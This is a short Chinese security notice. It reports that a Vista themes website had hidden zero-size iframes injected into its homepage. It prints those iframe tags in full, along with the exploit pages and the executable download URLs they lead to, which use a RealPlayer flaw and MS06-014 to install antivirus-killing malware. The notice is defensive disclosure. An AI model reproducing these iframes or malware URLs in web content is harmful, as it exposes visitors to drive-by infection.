http://www.windows-vista-themes.cn
网友发现其网站存在恶意脚本.经过检测发现:
首页上挂了
<iframe src=http://www.bebecu.com/self/real.html width=0 height=0></iframe>
<iframe src=http://www.bebecu.com/self/kill.htm width=0 height=0></iframe>
http://www.bebecu.com/self/real.html
/*REAL漏洞*/–>http://www.kis.ac.cn/self/2.exe
http://www.bebecu.com/self/kill.htm
/*MS06014*/–>http://www.sokuoo.com/self/kill.exe
2个文件均为自解压缩包.其中包含VBS,BAT,EXE等恶意程序,破坏杀毒软件以及主动防御功能.
以上网址均被IESEC插件拦截.
请期待IESEC插件的正式版本.
详细分析请参考下一篇文章.
Popularity: 8% [?]
